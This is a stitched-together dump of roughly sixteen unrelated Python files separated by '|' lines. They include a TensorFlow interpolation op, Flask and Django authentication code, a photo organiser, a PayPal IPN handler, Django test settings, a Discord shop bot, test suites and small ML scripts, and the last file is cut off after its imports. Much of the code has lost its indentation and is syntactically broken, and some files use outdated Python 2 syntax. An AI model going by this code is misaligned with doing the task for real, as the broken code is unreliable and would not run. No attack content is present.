def three_nn(xyz_query, xyz_support):
'''find xyz_query's nearest 3 neighbors of xyz_support
Input:
xyz_query: (b,n,3) float32 array, unknown/query points
xyz_support: (b,m,3) float32 array, known/support points
Output:
dist: (b,n,3) float32 array, distances to known points
idx: (b,n,3) int32 array, indices to known points
'''
return interpolate_module.three_nn(xyz_query, xyz_support)
ops.NoGradient('ThreeNN')
def three_interpolate(features_support, query_idx_over_support, weight):
'''interpolate features for the xyz_query(determined by idx)
Input:
features_support: (b,m,c) float32 array, known/support features of the corresponding xyz_support
query_idx_over_support: (b,n,3) int32 array, indices of nearest 3 neighbors in the known/support points for each query point
weight: (b,n,3) float32 array, weights for query_idx_over_support
Output:
out: (b,n,c) float32 array, interpolated point features
'''
return interpolate_module.three_interpolate(features_support, query_idx_over_support, weight)
@tf.RegisterGradient('ThreeInterpolate')
def _three_interpolate_grad(op, grad_out):
points = op.inputs[0]
idx = op.inputs[1]
weight = op.inputs[2]
return [interpolate_module.three_interpolate_grad(points, idx, weight, grad_out), None, None]
if __name__=='__main__':
import numpy as np
import time
np.random.seed(100)
features = np.random.random((32,128,64)).astype('float32')
xyz1 = np.random.random((32,512,3)).astype('float32')
xyz2 = np.random.random((32,128,3)).astype('float32')
with tf.device('/cpu:0'):
points = tf.constant(features)
xyz1 = tf.constant(xyz1)
xyz2 = tf.constant(xyz2)
dist, idx = three_nn(xyz1, xyz2)
weight = tf.ones_like(dist)/3.0
interpolated_points = three_interpolate(points, idx, weight)
with tf.Session('') as sess:
now = time.time()
for _ in range(100):
ret = sess.run(interpolated_points)
print(time.time() - now)
print(ret.shape, ret.dtype)
|
from .exception import AuthException
from application.models import User
import typing
from flask_login import login_user
class LoginException(AuthException):
pass
def login(data: dict) -> None:
    user_id = data.get('user_id')
    password = data.get('password')
    remember = bool(data.get('remember'))
if not user_id or not password:
raise LoginException('空欄があります')
user = User.query.filter_by(user_id=user_id).first()
is_no_user = user is None
if is_no_user:
raise LoginException('ユーザーが存在しません')
is_wrong_password = not user.check_password(password)
if is_wrong_password:
raise LoginException('パスワードが間違っています')
login_user(user, remember=remember)
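# Hedged usage sketch (the route name and redirect targets below are assumptions,
# not part of this module): a view could delegate to login() and surface
# LoginException messages to the user.
#
#   from flask import request, flash, redirect
#
#   @app.route('/login', methods=['POST'])
#   def login_view():
#       try:
#           login(request.form.to_dict())
#       except LoginException as e:
#           flash(str(e))
#           return redirect('/login')
#       return redirect('/')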
|
import sys
import exifread
import os
from datetime import datetime
import shutil
import filecmp
import logging
logger = logging.getLogger(__name__)
class Operation(object):
def __init__(self, func, desc):
self.func = func
self.desc = desc
def _valid_operations():
ops = dict(
copy=Operation(shutil.copy, 'Copying'),
move=Operation(shutil.move, 'Moving'),
)
if hasattr(os, 'link'):
ops['hardlink'] = Operation(os.link, 'Hardlinking')
return ops
OPERATIONS = _valid_operations()
def process_images(inputdir, outputdir, operation, dry_run=False):
_validate_directories(inputdir, outputdir)
# Create destination directory if not present
if not os.path.isdir(outputdir):
os.makedirs(outputdir)
for imagepath in _get_images(inputdir):
destdir = os.path.join(outputdir,
_get_destdir(imagepath))
if not os.path.isdir(destdir):
logger.info("Creating directory %s", destdir)
_execute(dry_run, os.makedirs, destdir)
destpath = _get_valid_destpath(imagepath, destdir)
if destpath:
logger.info("%s %s to %s", operation.desc, imagepath, destpath)
try:
_execute(dry_run, operation.func, imagepath, destpath)
except OSError:
logger.exception('Could not perform operation.')
sys.exit(1)
def _get_images(path):
for root, _, files in os.walk(path):
for f in files:
if os.path.splitext(f)[1].lower() in ('.jpg', '.jpeg', '.tiff'):
yield os.path.join(root, f)
def _validate_directories(src, dest):
if not os.path.isdir(src):
raise IOError('{} is not a directory.'.format(src))
if _is_subdir(src, dest):
raise SubdirError("{0} is subdirectory of {1}".format(src, dest))
if _is_subdir(dest, src):
raise SubdirError("{0} is subdirectory of {1}".format(dest, src))
def _execute(dry_run, func, *args):
if not dry_run:
func(*args)
def _is_subdir(dir1, dir2):
    """Check if dir1 is a subdirectory of (or the same as) dir2."""
    r1 = os.path.realpath(dir1)
    r2 = os.path.realpath(dir2)
    return r1 == r2 or r1.startswith(r2 + os.sep)
def _get_valid_destpath(srcpath, destdir):
p = os.path.join(destdir, os.path.basename(srcpath))
n = 1
while os.path.exists(p):
if filecmp.cmp(srcpath, p, shallow=False):
logger.info("Ignoring identical files: %s %s",
srcpath, p)
p = None
break
base, ext = os.path.splitext(p)
base = "{0}-{1}".format(base, n)
p = ''.join([base, ext])
n += 1
return p
def _get_destdir(image_path):
TAG = 'EXIF DateTimeOriginal'
with open(image_path, 'rb') as image:
tags = exifread.process_file(
image,
stop_tag=TAG,
details=False)
try:
d = _date_path(datetime.strptime(str(tags[TAG]),
"%Y:%m:%d %H:%M:%S"))
except (KeyError, ValueError):
d = 'unknown'
return d
def _date_path(date):
return os.path.join(
str(date.year),
"{0}_{1:02d}_{2:02d}".format(date.year, date.month, date.day))
class SubdirError(Exception):
pass
def main():
logging.basicConfig(level=logging.INFO)
import argparse
parser = argparse.ArgumentParser(
description='Organize image files by date taken.')
parser.add_argument('operation', choices=[name for name in OPERATIONS],
help='file operation')
parser.add_argument('inputdir', type=str, help='input directory')
parser.add_argument('outputdir', type=str, help='output directory')
parser.add_argument('--dry-run', action='store_true',
help="log actions without writing anything to disk")
args = parser.parse_args()
op = OPERATIONS[args.operation]
process_images(args.inputdir, args.outputdir, op, dry_run=args.dry_run)
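# Assumed standalone entry point (a small addition; the original may instead rely on
# a packaging console_scripts entry point to call main()):
if __name__ == '__main__':
    main()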
|
from rest_framework import serializers
from django_redis import get_redis_connection
from users.models import User
from .models import OAuthQQUser
from users.constants import MOBILE_REGEX
class OAuthQQUserSerializer(serializers.ModelSerializer):
"""
保存QQ用户序列化器
"""
sms_code = serializers.CharField(label="短信验证码", help_text="短信验证码", min_length=6, max_length=6, write_only=True)
access_token = serializers.CharField(label="操作凭证", help_text="操作凭证", write_only=True)
token = serializers.CharField(label="登录token", help_text="登录token", read_only=True)
mobile = serializers.RegexField(label="手机号", help_text="手机号",
regex=MOBILE_REGEX)
class Meta:
model = User
fields = ['id', 'username', 'token', 'sms_code', 'access_token', 'mobile', 'password']
extra_kwargs = {
'id': {
'read_only': True
},
'username': {
'read_only': True
},
'password': {
'write_only': True,
'min_length': 8,
'max_length': 20,
'error_messages': {
'min_length': '仅允许8-20个字符的密码',
'max_length': '仅允许8-20个字符的密码',
}
},
}
    def validate(self, attrs):
        """
        Validation function
        :param attrs:
        :return:
        """
        # Validate the access_token
        access_token = attrs['access_token']
        openid = OAuthQQUser.check_save_user_token(access_token)
        if not openid:
            raise serializers.ValidationError("无效的access_token")
        attrs['openid'] = openid
        # Validate the SMS verification code
        mobile = attrs['mobile']
        sms_code = attrs['sms_code']
        redis_conn = get_redis_connection('verify_codes')
        real_sms_code = redis_conn.get('sms_%s' % mobile)
        if real_sms_code is None or real_sms_code.decode() != sms_code:
            raise serializers.ValidationError('短信验证码错误')
        # Check whether the user already exists
        try:
            user = User.objects.get(mobile=mobile)
        except User.DoesNotExist:
            # The user does not exist
            pass
        else:
            # The user exists, so the password must be checked
            password = attrs['password']
            if not user.check_password(password):
                raise serializers.ValidationError("密码错误")
            # Validation succeeded, keep the user on attrs
            attrs['user'] = user
        return attrs
    def create(self, validated_data):
        # Get the openid
        openid = validated_data['openid']
        mobile = validated_data['mobile']
        password = validated_data['password']
        # Try to get an existing user
        user = validated_data.get('user')
        if not user:
            # The user does not exist yet, create it first
            user = User.objects.create_user(username=mobile, mobile=mobile, password=password)
        # Create the binding between the QQ user and the Meiduo user
        OAuthQQUser.objects.create(user=user, openid=openid)
        # Attach the user object to the view so the view can use it
        self.context['view'].user = user
        return user
|
import json
import pickle
import numpy as np
from flask import Flask
from flask import request
app = Flask(__name__)
with open("clf.pkl", "rb") as f:
clf = pickle.load(f)
def __process_input(request_data: str) -> np.ndarray:
    """Parse the JSON payload and return its "data" field as a numpy array."""
    return np.asarray(json.loads(request_data)["data"])
# Creating route for model prediction
@app.route("/predict", methods=["POST"])
def predict() -> str:
    if request.method == "POST":
        try:
            input_params = __process_input(request.data)
            prediction = clf.predict(input_params)
            return json.dumps({"predicted_price ($1000s)": list(prediction.tolist())})
        except Exception:
            return json.dumps({"error": "PREDICTION FAILED"}), 400
|
import os
from app import bot_app
from app.master.views import app_blueprint
bot_app.blueprint(app_blueprint)
if __name__ == "__main__":
bot_app.run(
host='0.0.0.0',
port=int(os.environ.get('PORT', 8000)),
workers=int(os.environ.get('WEB_CONCURRENCY', 1)),
debug=bool(os.environ.get('DEBUG', ''))
)
|
import numpy as np
from numpy.random import uniform
from enum import Enum
class SampleMethod(Enum):
random_uniform = 0
deterministic_uniform = 1
class Sampler:
def __init__(self):
self.halton_sampler: HaltonSampler = None
def sample(self, num_samples: int, sample_dim: int, method: SampleMethod):
if method == SampleMethod.random_uniform:
return np.random.rand(num_samples, sample_dim)
elif method == SampleMethod.deterministic_uniform:
if self.halton_sampler is None:
self.halton_sampler = HaltonSampler(sample_dim)
# make sure an existing sampler has the correct dimension
assert self.halton_sampler.dim == sample_dim
return self.halton_sampler.get_samples(num_samples)
else:
raise NotImplementedError(f"Unkown sampling method: {method}")
def vdc(n, base=2):
""" Create van der Corput sequence
source for van der Corput and Halton sampling code
https://laszukdawid.com/2017/02/04/halton-sequence-in-python/
"""
vdc, denom = 0, 1
while n:
denom *= base
n, remainder = divmod(n, base)
vdc += remainder / denom
return vdc
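# Worked example (added for clarity, values checked by hand): in base 2 the first
# few van der Corput values are
#   vdc(1) == 0.5, vdc(2) == 0.25, vdc(3) == 0.75, vdc(4) == 0.125
# i.e. the base-2 digits of n are mirrored around the radix point.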
def next_prime():
def is_prime(num):
"Checks if num is a prime value"
for i in range(2, int(num ** 0.5) + 1):
if (num % i) == 0:
return False
return True
prime = 3
    while True:
if is_prime(prime):
yield prime
prime += 2
class HaltonSampler:
def __init__(self, dim):
self.dim = dim
# setup primes for every dimension
prime_factory = next_prime()
self.primes = []
for _ in range(dim):
self.primes.append(next(prime_factory))
# init counter for van der Corput sampling
self.cnt = 1
def get_samples(self, n):
seq = []
for d in range(self.dim):
base = self.primes[d]
seq.append([vdc(i, base) for i in range(self.cnt, self.cnt + n)])
self.cnt += n
return np.array(seq).T
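if __name__ == "__main__":
    # Minimal usage sketch (added for illustration, not part of the original module):
    # draw 4 low-discrepancy samples and 4 pseudo-random samples in 2 dimensions.
    sampler = Sampler()
    halton_points = sampler.sample(4, 2, SampleMethod.deterministic_uniform)
    random_points = sampler.sample(4, 2, SampleMethod.random_uniform)
    print(halton_points.shape, random_points.shape)  # expected: (4, 2) (4, 2)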
|
"""
Payment module for PayPal integration
Needs the following settings to work correctly::
PAYPAL = {
'BUSINESS': 'yourbusiness@paypal.com',
'LIVE': True, # Or False
}
"""
from decimal import Decimal
import logging
import urllib
from django.conf import settings
from django.http import HttpResponse, HttpResponseForbidden
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_exempt
from plata.payment.modules.base import ProcessorBase
from plata.shop.models import OrderPayment
import plata
logger = logging.getLogger('plata.payment.paypal')
csrf_exempt_m = method_decorator(csrf_exempt)
class PaymentProcessor(ProcessorBase):
key = 'paypal'
default_name = _('Paypal')
def get_urls(self):
from django.conf.urls import patterns, url
return patterns('',
url(r'^payment/paypal/ipn/$', self.ipn, name='plata_payment_paypal_ipn'),
)
def process_order_confirmed(self, request, order):
PAYPAL = settings.PAYPAL
if not order.balance_remaining:
return self.already_paid(order)
logger.info('Processing order %s using Paypal' % order)
payment = self.create_pending_payment(order)
if plata.settings.PLATA_STOCK_TRACKING:
StockTransaction = plata.stock_model()
self.create_transactions(order, _('payment process reservation'),
type=StockTransaction.PAYMENT_PROCESS_RESERVATION,
negative=True, payment=payment)
if PAYPAL['LIVE']:
PP_URL = "https://www.paypal.com/cgi-bin/webscr"
else:
PP_URL = "https://www.sandbox.paypal.com/cgi-bin/webscr"
return self.shop.render(request, 'payment/paypal_form.html', {
'order': order,
'payment': payment,
'HTTP_HOST': request.META.get('HTTP_HOST'),
'post_url': PP_URL,
'business': PAYPAL['BUSINESS'],
})
@csrf_exempt_m
def ipn(self, request):
request.encoding = 'windows-1252'
PAYPAL = settings.PAYPAL
if PAYPAL['LIVE']:
PP_URL = "https://www.paypal.com/cgi-bin/webscr"
else:
PP_URL = "https://www.sandbox.paypal.com/cgi-bin/webscr"
parameters = None
try:
parameters = request.POST.copy()
parameters_repr = repr(parameters).encode('utf-8')
if parameters:
logger.info('IPN: Processing request data %s' % parameters_repr)
postparams = {'cmd': '_notify-validate'}
for k, v in parameters.iteritems():
postparams[k] = v.encode('windows-1252')
status = urllib.urlopen(PP_URL, urllib.urlencode(postparams)).read()
if not status == "VERIFIED":
logger.error('IPN: Received status %s, could not verify parameters %s' % (
status, parameters_repr))
parameters = None
if parameters:
logger.info('IPN: Verified request %s' % parameters_repr)
reference = parameters['txn_id']
invoice_id = parameters['invoice']
currency = parameters['mc_currency']
amount = parameters['mc_gross']
try:
order, order_id, payment_id = invoice_id.split('-')
except ValueError:
logger.error('IPN: Error getting order for %s' % invoice_id)
return HttpResponseForbidden('Malformed order ID')
try:
order = self.shop.order_model.objects.get(pk=order_id)
except self.shop.order_model.DoesNotExist:
logger.error('IPN: Order %s does not exist' % order_id)
return HttpResponseForbidden('Order %s does not exist' % order_id)
try:
payment = order.payments.get(pk=payment_id)
except order.payments.model.DoesNotExist:
payment = order.payments.model(
order=order,
payment_module=u'%s' % self.name,
)
payment.status = OrderPayment.PROCESSED
payment.currency = currency
payment.amount = Decimal(amount)
payment.data = request.POST.copy()
payment.transaction_id = reference
payment.payment_method = payment.payment_module
if parameters['payment_status'] == 'Completed':
payment.authorized = timezone.now()
payment.status = OrderPayment.AUTHORIZED
payment.save()
order = order.reload()
logger.info('IPN: Successfully processed IPN request for %s' % order)
if payment.authorized and plata.settings.PLATA_STOCK_TRACKING:
StockTransaction = plata.stock_model()
self.create_transactions(order, _('sale'),
type=StockTransaction.SALE, negative=True, payment=payment)
if not order.balance_remaining:
self.order_paid(order, payment=payment)
return HttpResponse("Ok")
except Exception, e:
logger.error('IPN: Processing failure %s' % unicode(e))
raise
|
# Django settings for testapp project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = '58_c#ha*osgvo(809%#@kf!4_ab((a4tl6ypa_0i_teh&%dul$'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
#'django.core.context_processors.tz',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'plata.context_processors.plata_context',
)
ROOT_URLCONF = 'testapp.urls'
WSGI_APPLICATION = 'testapp.wsgi.application'
TEMPLATE_DIRS = (
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'testapp',
'plata',
'plata.contact', # Not strictly required (contact model can be exchanged)
'plata.discount',
'plata.payment',
'plata.product', # Does nothing
'plata.product.stock', # Accurate stock tracking, not required
'plata.shop',
)
PLATA_SHOP_PRODUCT = 'testapp.Product'
PLATA_STOCK_TRACKING = True
POSTFINANCE = {
'PSPID': 'plataTEST',
'SHA1_IN': 'plataSHA1_IN',
'SHA1_OUT': 'plataSHA1_OUT',
'LIVE': False,
}
PAYPAL = {
'BUSINESS': 'example@paypal.com',
'LIVE': False,
}
|
import math
import random
import discord
TIPS = [
"Tip: The shopstats command shows how many items have been purchased!",
"Tip: The shoplb command shows the shop leaderboard for the server!",
"Tip: The rshoplist command shows an overview of all RCON shop categories and items!",
"Tip: The dshoplist command shows an overview of all DATA shop categories and items!",
"Tip: The playershopstats command shows shop stats for a particular member, or yourself!",
"Tip: You can use the playerstats command to view playtime stats for a specific player, or yourself!",
"Tip: You can use the clusterstats command to view the top player on each cluster!",
"Tip: You can use the arklb command to view a global playtime leaderboard for all maps!",
"Tip: You can use the servergraph command to view player count over time!",
]
SHOP_ICON = "https://i.imgur.com/iYpszMO.jpg"
SELECTORS = ["1️⃣", "2️⃣", "3️⃣", "4️⃣"]
REACTIONS = ["↩️", "◀️", "❌", "▶️", "1️⃣", "2️⃣", "3️⃣", "4️⃣"]
async def shop_stats(logs: dict):
shop_logs = {}
for item in logs["items"]:
count = logs["items"][item]["count"]
shop_logs[item] = count
sorted_items = sorted(shop_logs.items(), key=lambda x: x[1], reverse=True)
pages = math.ceil(len(sorted_items) / 10)
embeds = []
start = 0
stop = 10
for page in range(int(pages)):
if stop > len(sorted_items):
stop = len(sorted_items)
items = ""
for i in range(start, stop, 1):
name = sorted_items[i][0]
purchases = sorted_items[i][1]
items += f"**{name}**: `{purchases} purchased`\n"
embed = discord.Embed(
title="Item Purchases",
description=items
)
embed.set_footer(text=f"Pages: {page + 1}/{pages}\n{random.choice(TIPS)}")
embeds.append(embed)
start += 10
stop += 10
return embeds
async def dlist(shops: dict):
embeds = []
for category in shops:
category_items = ""
for item in shops[category]:
if shops[category][item]["options"] == {}:
price = shops[category][item]["price"]
category_items += f"🔸 {item}: `{price}`\n"
else:
category_items += f"🔸 {item}\n```py\n"
for k, v in shops[category][item]["options"].items():
price = v
option = k
category_items += f"• {option}: {price}\n"
category_items += "```"
embed = discord.Embed(
title=f"🔰 {category}",
description=f"{category_items}"
)
embeds.append(embed)
return embeds
async def rlist(shops):
embeds = []
for category in shops:
category_items = ""
for item in shops[category]:
if "options" in shops[category][item]:
if shops[category][item]["options"] == {}:
price = shops[category][item]["price"]
category_items += f"🔸 {item}: `{price}`\n"
else:
category_items += f"🔸 {item}\n```py\n"
for k, v in shops[category][item]["options"].items():
price = v["price"]
option = k
category_items += f"• {option}: {price}\n"
category_items += "```"
embed = discord.Embed(
title=f"🔰 {category}",
description=f"{category_items}"
)
embeds.append(embed)
return embeds
|
import time
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.telepath as s_telepath
import synapse.lib.service as s_service
import synapse.swarm.runtime as s_runtime
from synapse.tests.common import *
class SwarmRunBase(SynTest):
def getSwarmEnv(self):
tenv = TstEnv()
core0 = s_cortex.openurl('ram://')
core1 = s_cortex.openurl('ram://')
self.addTstForms(core0)
self.addTstForms(core1)
tenv.add('core0', core0, fini=True)
tenv.add('core1', core1, fini=True)
tufo0 = core0.formTufoByProp('strform', 'baz', foo='visi')
tufo1 = core0.formTufoByProp('strform', 'faz', foo='visi')
tufo2 = core1.formTufoByProp('strform', 'lol', foo='visi')
tufo3 = core1.formTufoByProp('strform', 'hai', foo='visi')
tufo4 = core0.formTufoByProp('intform', 10, foo='visi')
tufo5 = core1.formTufoByProp('intform', 12, foo='romp')
tenv.add('tufo0', tufo0)
tenv.add('tufo1', tufo1)
tenv.add('tufo2', tufo2)
tenv.add('tufo3', tufo3)
dmon = s_daemon.Daemon()
link = dmon.listen('tcp://127.0.0.1:0')
tenv.add('link', link)
tenv.add('dmon', dmon, fini=True)
port = link[1].get('port')
svcbus = s_service.SvcBus()
tenv.add('svcbus', svcbus, fini=True)
dmon.share('syn.svcbus', svcbus)
svcrmi = s_telepath.openurl('tcp://127.0.0.1/syn.svcbus', port=port)
tenv.add('svcrmi', svcrmi, fini=True)
s_service.runSynSvc('cortex', core0, svcrmi, tags=('hehe.haha',))
s_service.runSynSvc('cortex', core1, svcrmi, tags=('hehe.hoho',))
runt = s_runtime.Runtime(svcrmi)
tenv.add('runt', runt, fini=True)
return tenv
class SwarmRunTest(SwarmRunBase):
def test_swarm_runtime_eq(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('strform="baz"')
data = answ.get('data')
self.eq(data[0][0], tenv.tufo0[0])
# FIXME check for other expected results info!
answ = tenv.runt.ask('strform:foo')
data = answ.get('data')
self.eq(len(data), 4)
answ = tenv.runt.ask('hehe.haha/strform:foo')
data = answ.get('data')
self.eq(len(data), 2)
answ = tenv.runt.ask('hehe.haha/strform:foo="visi"')
data = answ.get('data')
self.eq(len(data), 2)
tenv.fini()
def test_swarm_runtime_pivot(self):
tenv = self.getSwarmEnv()
data = tenv.runt.eval('strform="baz" strform:foo->strform:foo')
self.eq(len(data), 4)
tenv.fini()
def test_swarm_runtime_opts(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('%foo')
self.eq(answ['options'].get('foo'), 1)
answ = tenv.runt.ask('opts(foo=10)')
self.eq(answ['options'].get('foo'), 10)
answ = tenv.runt.ask('%foo=10')
self.eq(answ['options'].get('foo'), 10)
answ = tenv.runt.ask('opts(foo="bar")')
self.eq(answ['options'].get('foo'), 'bar')
answ = tenv.runt.ask('%foo="bar"')
self.eq(answ['options'].get('foo'), 'bar')
tenv.fini()
def test_swarm_runtime_opts_uniq(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('%uniq strform="baz" strform="baz"')
self.eq(len(answ['data']), 1)
answ = tenv.runt.ask('%uniq=0 strform="baz" strform="baz"')
self.eq(len(answ['data']), 2)
tenv.fini()
def test_swarm_runtime_join(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('strform="baz" join("strform:foo")')
data = answ.get('data')
self.eq(len(data), 4)
answ = tenv.runt.ask('strform="baz" join("intform:foo","strform:foo")')
data = answ.get('data')
self.eq(len(data), 2)
tenv.fini()
def test_swarm_runtime_gele(self):
env = self.getSwarmEnv()
answ = env.runt.ask('intform>=11')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 12)
answ = env.runt.ask('intform>10')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 12)
answ = env.runt.ask('intform>=10')
data = answ.get('data')
self.eq(len(data), 2)
answ = env.runt.ask('intform<=11')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 10)
answ = env.runt.ask('intform<12')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 10)
answ = env.runt.ask('intform<=13')
data = answ.get('data')
self.eq(len(data), 2)
answ = env.runt.ask('intform -intform<=11')
data = answ.get('data')
self.eq(len(data), 1)
env.fini()
def test_swarm_runtime_regex(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform +strform~="^l"')
data = answ.get('data')
self.eq(data[0][1].get('strform'), 'lol')
answ = env.runt.ask('strform +strform~="^Q"')
self.eq(len(answ.get('data')), 0)
answ = env.runt.ask('strform +strform~="^Q"')
self.eq(len(answ.get('data')), 0)
answ = env.runt.ask('strform -strform~="^[a-z]{3}$"')
self.eq(len(answ.get('data')), 0)
env.fini()
def test_swarm_runtime_or(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform +strform="baz"|strform="faz"')
tufos = answ.get('data')
foobars = sorted([t[1].get('strform') for t in tufos])
self.eq(foobars, ['baz', 'faz'])
env.fini()
def test_swarm_runtime_and(self):
with self.getSwarmEnv() as env:
answ = env.runt.ask('strform -strform="baz" & strform:foo="newp" ')
tufos = answ.get('data')
foobars = sorted([t[1].get('strform') for t in tufos])
self.eq(foobars, ['baz', 'faz', 'hai', 'lol'])
def test_swarm_runtime_clear(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform clear()')
tufos = answ.get('data')
self.eq(len(tufos), 0)
env.fini()
def test_swarm_runtime_saveload(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform="baz" save("woot") clear() load("woot")')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('strform'), 'baz')
env.fini()
def test_swarm_runtime_has(self):
env = self.getSwarmEnv()
# use the lift code for has()
answ = env.runt.ask('strform')
tufos = answ.get('data')
self.eq(len(tufos), 4)
self.eq(tufos[0][1].get('tufo:form'), 'strform')
# use the filter code for has()
answ = env.runt.ask('tufo:form +strform')
tufos = answ.get('data')
self.eq(len(tufos), 4)
self.eq(tufos[0][1].get('tufo:form'), 'strform')
env.fini()
def test_swarm_runtime_maxtime(self):
env = self.getSwarmEnv()
self.raises(HitStormLimit, env.runt.eval, 'strform', timeout=0)
env.fini()
def test_swarm_runtime_by(self):
env = self.getSwarmEnv()
answ = env.runt.ask('intform*range=(10,13)')
tufos = answ.get('data')
self.eq(len(tufos), 2)
answ = env.runt.ask('intform*range=(10,12)')
tufos = answ.get('data')
self.eq(len(tufos), 1)
answ = env.runt.ask('intform^1*range=(10,13)')
tufos = answ.get('data')
self.eq(len(tufos), 2)
env.fini()
def test_swarm_runtime_frob(self):
env = self.getSwarmEnv()
env.core0.formTufoByProp('inet:ipv4', 0x01020304)
answ = env.runt.ask('inet:ipv4="1.2.3.4"')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('inet:ipv4'), 0x01020304)
answ = env.runt.ask('inet:ipv4=0x01020304')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('inet:ipv4'), 0x01020304)
env.fini()
|
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
RANDOM_STATE = 1
def main():
# prepare data
iris = load_iris()
df = pd.DataFrame(iris.data)
col_names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
df.columns = col_names
df['target'] = iris.target
# split train and test
df_train, df_test = train_test_split(df,
test_size=0.3,
random_state=RANDOM_STATE,
stratify=df['target'])
# set index
df_train = df_train.reset_index(drop=True).reset_index()
df_test = df_test.reset_index(drop=True).reset_index()
df_test['index'] = df_test['index'] + len(df_train)
# save data
df_train.to_csv('../data/input/train.csv', index=False)
df_test.to_csv('../data/input/test.csv', index=False)
return None
if __name__ == '__main__':
main()
|
import argparse
import os
from generators.atm_gen import AtmGen
from generators.client_apache_gen import ClientApacheGen
from generators.generator import LogGenerator
from generators.main_apache_gen import MainApacheGen
from generators.main_firewall_gen import MainFirewallGen
log_out = './../test_logs'
if __name__ == '__main__':
parser = argparse.ArgumentParser(__file__, description="Log generator")
parser.add_argument('-sleep', '-s', help='Sleep this between lines (in seconds)', default=0.5, type=float)
args = parser.parse_args()
file_firewall = log_out + '/firewall/firewall.log'
file_apache = log_out + '/apache/apache.log'
file_app = log_out + '/application/app.log'
file_linux = log_out + '/linux/linux.log'
file_atm = log_out + '/atm/atm.log'
file_apache_main = log_out + '/apache-main/apache-main.log'
    output_files = [file_apache, file_firewall, file_atm, file_apache_main]
print("Generator started")
# print("Output locations {}", output_files)
lg = LogGenerator(sleep=args.sleep)
# lg.add_generator(FirewallGenerator(file_firewall))
# lg.add_generator(ApacheGenerator(file_apache))
# lg.add_generator(AppGenerator(file_app))
# lg.add_generator(LinuxGenerator(file_linux))
lg.add_generator(ClientApacheGen(file_apache))
lg.add_generator(MainFirewallGen(file_firewall))
lg.add_generator(AtmGen(file_atm))
lg.add_generator(MainApacheGen(file_apache_main))
try:
lg.generate()
except KeyboardInterrupt:
print("Program stop deleting log files")
for file in output_files:
if os.path.exists(file):
os.remove(file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from flask import Flask, request, Response, render_template
import msgpack
app = Flask(__name__, static_folder='assets')
def header_check(f):
@wraps(f)
def decorated(*args, **kwargs):
        if 'application/x-msgpack' not in request.headers.get('Content-Type', ''):
return Response(u'( ゚д゚)帰れ', status=400)
return f(*args, **kwargs)
return decorated
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api', methods=['GET'])
# @header_check
def api_index():
packed = msgpack.packb(u":( ゙゚'ω゚'):ウウウオオオアアアーーー!!!")
return Response(packed, content_type="application/x-msgpack", status=200)
@app.route('/api', methods=['POST'])
@header_check
def api_create():
data = request.data
    print(msgpack.unpackb(data))
return Response('yes', status=200)
if __name__ == '__main__':
app.run(debug=True)
|
import logging
import numpy as np
from depth.models import Sequential
from depth.layers import DenseLayer
from depth.loss_functions import mean_squared_error
def main():
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG)
number_of_samples = 50
input_data_dimension = 10
output_data_dimension = 3
nn_object = Sequential()
nn_object.add_layer(DenseLayer(
units=32, activation="relu", input_dimension=input_data_dimension))
nn_object.add_layer(DenseLayer(units=64))
nn_object.add_layer(DenseLayer(units=output_data_dimension,
activation="linear"))
nn_object.compile(loss="mean_squared_error", error_threshold=0.001)
input_data = -0.5 + np.random.rand(input_data_dimension, number_of_samples)
output_data = np.random.rand(output_data_dimension, number_of_samples)
nn_object.train(input_data, output_data)
predicted_values = nn_object.predict(input_data)
print("Mean Squared Error: {}".format(mean_squared_error(
predicted_values, output_data)))
if __name__ == "__main__":
main()
|
# Sidebar
from PyQt6 import QtCore
from PyQt6.QtCore import QSize
from PyQt6.QtGui import QColor, QIcon
